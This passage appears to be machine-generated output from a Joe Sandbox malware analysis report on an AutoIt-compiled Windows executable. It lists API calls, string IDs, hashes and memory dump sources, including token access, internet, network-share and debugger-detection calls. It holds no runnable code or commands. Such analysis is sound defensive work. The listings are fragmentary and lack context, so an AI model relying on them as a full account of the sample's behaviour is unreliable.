                                                    • Opcode Fuzzy Hash: d1e56e32b507c5b6a987047037203d8da88dd32b8c6ad97e60c53d220b07aa21
                                                    • Instruction Fuzzy Hash: 5FE03931141228BADB201BA2DC0CED73F1EEF167A2F008224FA08C4060D6758594CBA0
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00602231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0060223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00602250
                                                    • GetStockObject.GDI32(00000005), ref: 00602258
                                                    • GetWindowDC.USER32(?,00000000), ref: 0063C0D3
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0063C0E0
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0063C0F9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0063C112
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0063C132
                                                    • ReleaseDC.USER32(?,00000000), ref: 0063C13D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                     • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: b3f3646b4c9b8888d64448d93c16b8fd2ad9efd9ef4c6f05690b6d854501b7bb
                                                    • Instruction ID: c816a154da48c706ad2bc51cbb4d9957e27eb0ee7598234b5ed7cd490f087b39
                                                    • Opcode Fuzzy Hash: b3f3646b4c9b8888d64448d93c16b8fd2ad9efd9ef4c6f05690b6d854501b7bb
                                                    • Instruction Fuzzy Hash: D8E06D32100244FADB215FA4FC0D7D83B12EB15332F108366FAA9580E187724990DB52
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00658C63
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0065882E), ref: 00658C6A
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0065882E), ref: 00658C77
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0065882E), ref: 00658C7E
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00642187
                                                    • GetDC.USER32(00000000), ref: 00642191
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006421B1
                                                    • ReleaseDC.USER32(?), ref: 006421D2
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 0064219B
                                                    • GetDC.USER32(00000000), ref: 006421A5
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006421B1
                                                    • ReleaseDC.USER32(?), ref: 006421D2
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %i
                                                    • API String ID: 0-950836615
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __itow_s
                                                    • String ID: xrl$xrl
                                                    • API String ID: 3653519197-1954299954
                                                    APIs
                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • __wcsnicmp.LIBCMT ref: 0066B298
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0066B361
                                                    Strings
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: Oaa
                                                    • API String ID: 4104443479-3268679879
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00612AC8
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00612AE1
                                                    Strings
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    APIs
                                                      • Part of subcall function 0060506B: __fread_nolock.LIBCMT ref: 00605089
                                                    • _wcscmp.LIBCMT ref: 00669AAE
                                                    • _wcscmp.LIBCMT ref: 00669AC1
                                                    Strings
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID: Dtl$Dtl
                                                    • API String ID: 1473721057-3066943355
                                                    APIs
                                                    • _memset.LIBCMT ref: 00672892
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006728C8
                                                    Strings
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00686D86
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00686DC2
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662E00
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00662E3B
                                                    Strings
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006869D0
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006869DB
                                                    Strings
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: Combobox
                                                    • API String ID: 3850602802-2096851135
                                                    APIs
                                                      • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                      • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                      • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                    • GetWindowRect.USER32(00000000,?), ref: 00686EE0
                                                    • GetSysColor.USER32(00000012), ref: 00686EFA
                                                    Strings
                                                    Similarity
                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                    • String ID: static
                                                    • API String ID: 1983116058-2160076837
                                                    APIs
                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00686C11
                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00686C20
                                                    Strings
                                                    Similarity
                                                    • API ID: LengthMessageSendTextWindow
                                                    • String ID: edit
                                                    • API String ID: 2978978980-2167791130
                                                    APIs
                                                    • _memset.LIBCMT ref: 00662F11
                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00662F30
                                                    Strings
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    APIs
                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00672520
                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00672549
                                                    Strings
                                                    Similarity
                                                    • API ID: Internet$OpenOption
                                                    • String ID: <local>
                                                    • API String ID: 942729171-4266983199
                                                    APIs
                                                      • Part of subcall function 0067830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006780C8,?,00000000,?,?), ref: 00678322
                                                    • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
                                                    • htons.WSOCK32(00000000,?,00000000), ref: 00678108
                                                    Strings
                                                    Similarity
                                                    • API ID: ByteCharMultiWidehtonsinet_addr
                                                    • String ID: 255.255.255.255
                                                    • API String ID: 2496851823-2422070025
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00603C26,006C62F8,?,?,?), ref: 00610ACE
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • _wcscat.LIBCMT ref: 006450E1
                                                    Strings
                                                    Similarity
                                                    • API ID: FullNamePath_memmove_wcscat
                                                    • String ID: cl
                                                    • API String ID: 257928180-4008018315
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00659355
                                                    Strings
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0065924D
                                                    Strings
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    APIs
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                      • Part of subcall function 0065B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0065B0E7
                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 006592D0
                                                    Strings
                                                    Similarity
                                                    • API ID: ClassMessageNameSend_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 372448540-1403004172
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: @Rl
                                                    • API String ID: 3494438863-1129465463
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ClassName_wcscmp
                                                    • String ID: #32770
                                                    • API String ID: 2292705959-463685578
                                                    APIs
                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 006581CA
                                                      • Part of subcall function 00623598: _doexit.LIBCMT ref: 006235A2
                                                    Strings
                                                    Similarity
                                                    • API ID: Message_doexit
                                                    • String ID: AutoIt$Error allocating memory.
                                                    • API String ID: 1993061046-4017498283
                                                    APIs
                                                      • Part of subcall function 0063B564: _memset.LIBCMT ref: 0063B571
                                                      • Part of subcall function 00620B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0063B540,?,?,?,0060100A), ref: 00620B89
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0060100A), ref: 0063B544
                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0060100A), ref: 0063B553
                                                    Strings
                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0063B54E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                    • API String ID: 3158253471-631824599
                                                    • Opcode ID: f8779d44c14a3269fa02dae6f0972ee3fb41a3519f2089572e43990e724f5504
                                                    • Instruction ID: 3d01b67c0a97c6eca464446554c7e8269c9f284bef0d7765de63754815e991be
                                                    • Opcode Fuzzy Hash: f8779d44c14a3269fa02dae6f0972ee3fb41a3519f2089572e43990e724f5504
                                                    • Instruction Fuzzy Hash: B8E06DB02007128BD760EF68E4047427BE2AB00755F009A2DE546C2251D7B4D944CFA1